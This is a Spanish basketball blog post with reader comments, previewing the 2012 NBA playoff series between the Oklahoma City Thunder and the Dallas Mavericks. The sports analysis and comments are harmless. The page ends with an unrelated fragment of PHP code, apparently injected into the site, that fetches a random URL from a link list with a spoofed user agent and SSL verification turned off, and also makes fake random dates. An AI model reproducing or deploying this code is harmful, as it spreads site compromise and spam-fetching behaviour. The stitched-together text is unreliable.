Análisis: Oklahoma City Thunder (2) vs Dallas Mavericks (7)

28 de April de 2012 por Esteban

Regular: 3-1

Thunder: 103.1 PF – 96.9 PC
Mavericks: 95.8 PF – 94.8 PC

Estamos ante la eliminatoria que quizás despierte menos interés en el Oeste pero también ante la eliminatoria con más posibilidades de sorpresa y quién sabe si una de las más largas. Por la lesión de Harden y por aquello de “nunca subestimes el corazón de un campeón”.

Los caminos de ambos equipos hasta aquí han sido tremendamente dispares. OKC Thunder dominó la conferencia a gusto y placer durante la mayor parte de la temporada, afianzándose en sus tres grandes, con un paso al frente enorme de James Harden, ya anotado entre los mejores cinco escoltas de toda la competición, y el trabajo a modo MVP de Durant. Por su parte, Westbrook mantiene los mismos problemas del año pasado, pero fortalece sus virtudes ofensivas, y está en la élite de los base jóvenes de la liga. El resto del equipo está compuesto por defensores poco talentosos a la hora de anotar, demasiado poco talentosos, pero buenos jugadores de rol. Serge Ibaka no ha dado el salto que se esperaba pero sigue siendo un buen jugador, mientras que Kendrick Perkins es uno de los peores pívots de la liga. No me gusta su juego de pistoleros, pasar mitad de cancha y dársela a alguno de sus tres grandes para que la tire, pero creo que con eso le alcanzará igualmente en esta eliminatoria.

Los Mavs, son la otra cara: una temporada horrible, apenas clasificándose a los PO (terminó solo encima de los Jazz). Sus baluartes no han terminado de arrancar, como es el caso de Terry, Marion y Kidd, todos muy lejos del nivel del año pasado, mientras que sus incorporaciones, valiosos jugadores de rol, apenas son una sombra de lo que se espera de ellos. Lo de Carter es muy notorio por ser titular pero lo de West también ha sido malo y mejor ni nombrar a un desterrado Lamar Odom. Se esperaba que alguno de sus tantos pivotes tuviera “SU” temporada (algo parecido a lo de Tyson, ya que cuando llegó, pintaba para suplente y despegó), pero no ha sido así. Solo algo de Mahinmi, productivo lo de Wright, nada de Yi y pésimo lo de Haywood (caso perdido). Del último MVP de las Finales hablaré más adelante.

Claves de la eliminatoria

– Juego interior: Thunder armó su juego interior el año pasado imaginándose que se enfrentarían a las torres gemelas de los Lakers, así que tienen cuatro jugadores altamente capacitados para defender incluso a Howard si hubiera sido necesario, pero que a su vez son pésimos anotadores y creadores de tiro, además de mediocres reboteros. En esta eliminatoria, por mejores que sean defendiendo no les va a servir de mucho ya que los pivotes de los Mavs tiran al aro tan poco como ellos. Será un duelo de NADA. Además como ya lo dije son rocosos pero lentos y solo Collison podría causarle algún problema a Dirk Nowitzki.

– Banco de suplentes: aquí saca ventaja el Thunder. Quién lo diría a comienzo de temporada, cuando Mavs tenían quizá 3 de los mejores 10 sextos hombres de toda la NBA, con West, Terry y Odom. Ahora este último ya no está, Terry está desanimado por una oferta que no recibió, y West, bueno, es West. Mientras que el Thunder con la experiencia de Fisher, un All-Star como Harden y el productivo Collison, a su manera suplen bien a sus titulares.

– James Harden: habrá que ver cómo y cuándo vuelve de su lesión. De más está decir que es fundamental en este equipo. Aunque Durant podría ganar la eliminatoria sin él, quizás debería necesitar de sus cuatro partidos de local para ello. Con un Harden estelar, como aquel que se fue en algún partido por encima de los 40 puntos, los Mavs casi no tienen chances. Sin él, habrá que ver.

– Dirk y el corazón de campeón: pues los Mavs deberán acudir a ese lema más que nunca, y sobre todo a su estrella. Otros PO como los del año pasado y quién sabe, hasta podría llevarse la serie. Lo cierto es que lo mejor de Dirk se vio en los últimos minutos de los partidos, donde llegaban igualados por lo general gracias a un gran trabajo grupal. Ahora, para lucirse en esos instantes, primero deberán llegar a esos últimos minutos sin estar 20 puntos abajo. Dirk es un asesino a sangre fría, no demoledor con explosivos y difícilmente lo veamos irse hasta los 40 puntos o más para mantener solo a su equipo en juego (como podría hacer el propio Durant, James o Kobe). Necesitará mucho de su equipo y este no sé si está capacitado para responder. En todo caso, si se llega a finales muy ajustados, puede volver a tomar la importancia del año pasado.

Pronóstico

4-1 con Thunder con Harden, 4-3 Thunder sin Harden.

Calendario (hora española)

Partido 1 – Lunes 30 de abril en Oklahoma City (03h30)
Partido 2 – Martes 1 de mayo en Oklahoma City (03h30)
Partido 3 – Viernes 4 de mayo en Dallas, (03h30)
Partido 4 – Domingo 6 de mayo en Dallas, (01h30)
Partido 5 – Lunes 7 de mayo en Oklahoma City
Partido 6 – Jueves 10 de mayo en Dallas
Partido 7 – Sábado 12 de mayo en Oklahoma City

Comenta

16 comentarios a esta entrada

  1. Heineken dice:
    #1

    Buff creo que el verdadero termómetro de este cruce será Westbrook, si vuelve a las andadas con más perdidas que asistencias, juego alocado en general pero poco productivo y creyéndose más que Durant los Thunder pueden llevarse un batacazo tremendo, porque si a Dirk le pones las cosas fáciles, no se anda con chiquitas.

    De todas formas diré que pasan los Thunder 4-2

      Citar

  2. Jose Luis dice:
    #2

    Pues yo opino que un 4-1, es lo que creo que puede ocurrir. Los Mavs están perdidos, y no digo 4-0 porque no conviene a la NBA, y porque algún juego grande harán los jugadores de los Mavs, digo yo.

      Citar

  3. Nacho dice:
    #3

    Creo que los Thunder tienen un problema con los minutos de Ibaka (creo que Deer o Magic ya lo han dicho por aquí). Y no solo eso, sino con sus tiros. Es un tipo que puede irse a los 10-15 puntos por partido sin problema, pero claro, para eso otros tienen que jugarse menos tiros (no digo quién) Collison es aceptable, pero no creo que para jugar los mismos minutos que Ibaka. Durant raramente hace un partido malo, con lo que, del lado de los Thunder ya sabemos cuál es la clave.
    Y cierto Esteban, no subestimes el corazón de Dirk, lo que pasa es que late demasiado solo. Eso sí, como dije en el comentario al análisis de los Heat, y como dices tú, si Oklahoma quiere pasar, que no deje muchos partidos a la ruleta Durant-Dirk, que la cosa puede caer del lado Maverick.

      Citar

  4. Sancho88 dice:
    #4

    Esta eliminatoria puede ser balsámica para unos Thunder heridos en el mes de abril. Les ha tocado el mejor equipo para recuperar sensaciones, y con esto quiero decir que los Mavs no tienen nivel para disputar esta eliminatoria… incluso los Jazz habrían puesto en muchos más problemas a estos Thunder, pero han llegado tarde. 4-0 al canto

      Citar

  5. MagicJohnson32 dice:
    #5

    O Dirk y Terry la lían muy muy gorda, o la eliminatoria será cortita. Aunque tampoco me fío demasiado de Brooks. Debería jugar muchos minutos con Ibaka de C y Durant de falso 4, emparejado con Dirk. Si se empeña en mantener a Perkins, los Mavs pueden sacar provecho.

      Citar

  6. melo15 dice:
    #6

    De que manera se pueden aprovechar??

      Citar

  7. MagicJohnson32 dice:
    #7

    Se pueden aprovechar:
    1 – dejando de prestar atención en defensa sobre Perkins y preocupándose de los demás.
    2- poniendo a Dirk de falso 5 para no desgastarlo en defensa.
    3- poniendo una alineación bajita, y a correr con Kidd, Terry, Roddy Beaubois o Delonte, jugadores que se atascan en estático pero te matan en transición

    Si algo hacen bien estos Mavs es la defensa zonal. Y ya me dirás tú qué pinta Perkins en ataque ante una zona y en defensa ante un equipo sin un buen pívot al que defender.

      Citar

  8. Sancho88 dice:
    #8

    Sobre Harden, yo no sé si estará o no para jugar, difícil de saberlo después de aquello… esperemos que sí, pero por si acaso yo lo reservaría, no digo reservarlo de que no juegue, pero sí darle más protagonismo a Sefolosha que parece que ha vuelto bastante bien. Creo que aunque no esté Harden es imposible que Dallas les gane 3 partidos Esteban…

      Citar

  9. MagicJohnson32 dice:
    #9

    Por fortuna, Harden está perfectamente. Ayer se entrenó con normalidad y ni siquiera le limitarán los minutos de juego.

      Citar

  10. Esteban dice:
    #10

    vi al thunder frente a losa lakers cuando no estaba harden y madre mia q banda, ni cortinas ni desmarques, una bola durant tirando sobre la marca, otra bola russell tirando sodbre la marca, y asi hasta q termino el partido

      Citar

  11. German dice:
    #11

    Con Harden Oklahoma deberia pasar la eliminatoria. Igual, nunca hay que dar por muerto al campeon. Va a ser clave para el futuro del Thunder como responde Westbrook tras su espantosa serie contra los Mavs del año pasado, ojala no lastre al equipo

      Citar

  12. Alfredo dice:
    #12

    4-0 para OKC y a seguir como dice Sancho.
    Me cae bien Dirk, lo siento por el. Pero si fuese aficionado Maverick, no estaria preocupado por la eliminatoria sino por saber si hay vida despues de la muerte…. Hay algo para reconstruir post Nowitzki, Terry etc???

      Citar

  13. Lucho dice:
    #13

    Me cuesta bastante arriesgar aca. Gana OKC 4-2

      Citar

  14. Lucho dice:
    #14

    Terrible clutch de Durant, 1-0 OKC

      Citar

  15. Denise dice:
    #15

    Vaya canaston de Durant para ganar el partido. No se le puede reprochar nada a Marion que defendió esa jugada bastante bien.

      Citar

  16. Sancho88 dice:
    #16

    Durant reivindicándose, la verdad que es un churro de tiro y es milagroso que haya entrado, pero entró. Los grandes siempre la meten… A quién le darán el MVP’? Siguen haciendo méritos, como si lo que hicieran ahora mismo repercurtiese en el premio. Realmente, a quien se lo den será justo, pero el que se quede sin él también se podrá argumentar que es injusto… Podría ser MVP compartido? Ah, y Serge demostrando cositas anoche… chapó por su partido, con triplazo incluído. Ole Serge!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>